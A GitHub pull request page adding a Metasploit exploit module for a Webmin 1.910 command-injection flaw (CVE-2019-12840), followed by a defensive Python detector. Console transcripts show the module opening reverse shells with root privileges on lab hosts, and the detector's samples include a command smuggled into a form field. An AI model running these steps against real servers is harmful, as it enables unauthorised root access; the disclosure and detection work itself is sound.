CVE-2019-12840 - Add Webmin 1.910 RCE Module #11983

Merged
merged 7 commits into from Jun 19, 2019

5 participants
@siberguvenlik
Contributor

commented Jun 16, 2019

Adding Webmin RCE module affecting Webmin <= 1.910.
Module exploits an arbitrary command execution vulnerability.
Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

Verification

msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.9
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! rce has the right to >>Package Update<<

[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444
[+] Session cookie: b188bde1b3979ada77f1f8e4f84f7d4c
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.9:57270) at 2019-06-16 11:07:04 -0400

id
uid=0(root) gid=0(root) groups=0(root)

Details and References

https://nvd.nist.gov/vuln/detail/CVE-2019-12840
https://www.exploit-db.com/exploits/46984
https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html

@siberguvenlik


siberguvenlik added some commits Jun 17, 2019

Converting version check request to vars_get
We also need to add the "testing = 1" cookie to the login request. Otherwise, the browser displays a No-Cookie error.

@space-r7 space-r7 added docs and removed needs-docs labels Jun 17, 2019

@space-r7 space-r7 self-assigned this Jun 17, 2019

@wvu-r7
Contributor

left a comment

Comments for @space-r7 to possibly address.

@space-r7

Contributor

commented Jun 17, 2019

Hi @siberguvenlik, I just submitted a PR to your branch that addresses the changes suggested here in this PR. Please let me know if you have any issues with that. Thank you!

Merge pull request #1 from space-r7/pr11983
Add minor module changes
@siberguvenlik

Contributor Author

commented Jun 18, 2019

Thanks @space-r7 and @wvu-r7. I performed the required action.

@wvu-r7

wvu-r7 approved these changes Jun 18, 2019

@space-r7

Contributor

commented Jun 19, 2019

Tested:

msf5 > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 192.168.37.132
rhosts => 192.168.37.132
msf5 exploit(linux/http/webmin_packageup_rce) > set username space
username => space
msf5 exploit(linux/http/webmin_packageup_rce) > set password password
password => password
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! space has the right to >>Package Update<<
[+] 192.168.37.132:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Session cookie: f20e69324fc0187678798822c4c21365
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.132:57616) at 2019-06-19 08:29:59 -0500

whoami

root

@space-r7 space-r7 merged commit 992a638 into rapid7:master Jun 19, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

space-r7 added a commit that referenced this pull request Jun 19, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2019

@space-r7

Contributor

commented Jun 19, 2019

Release Notes

The Webmin RCE module targets CVE-2019-12840. It gets code execution with root privileges in Webmin versions <= 1.910 via the unsanitized data parameter to update.cgi.

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 26, 2019
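
A defender-side check for the issue described in this thread, as an added example that is not part of the PR or the Metasploit module: it flags Webmin versions at or below 1.910 and form parameters posted to update.cgi that contain shell metacharacters. The metacharacter set, the request path prefix, the three-digit minor version format and the sample bodies are constructed assumptions; it inspects every parameter rather than only the data parameter the page names.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Last affected release according to the PR text ("Webmin <= 1.910").
LAST_AFFECTED = (1, 910)

# Assumption: characters a shell treats as separators, pipes,
# redirection or substitution. Tune for your own false-positive budget.
SHELL_META = re.compile(r"[|;&`$<>\n]")


def is_affected_version(version: str) -> bool:
    """True when a 'major.minor' Webmin version string is <= 1.910."""
    major, _, minor = version.strip().partition(".")
    return (int(major), int(minor or 0)) <= LAST_AFFECTED


def suspicious_update_params(path: str, body: str) -> list:
    """Return (name, value) pairs from a form body sent to update.cgi
    whose decoded value contains a shell metacharacter."""
    if not urlsplit(path).path.endswith("/update.cgi"):
        return []
    pairs = parse_qsl(body, keep_blank_values=True)
    return [(name, value) for name, value in pairs if SHELL_META.search(value)]


# Constructed sample requests (path, url-encoded body); not captured traffic.
SAMPLES = [
    ("/package-updates/update.cgi", "data=somepkg&confirm=1"),
    ("/package-updates/update.cgi", "data=somepkg+%7C+id"),
    ("/package-updates/index.cgi", "data=a%7Cb"),
]

if __name__ == "__main__":
    for version in ("1.890", "1.910", "1.920"):
        print(version, "affected" if is_affected_version(version) else "not affected")
    for path, body in SAMPLES:
        hits = suspicious_update_params(path, body)
        print(path, "ALERT" if hits else "ok", hits)
```
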
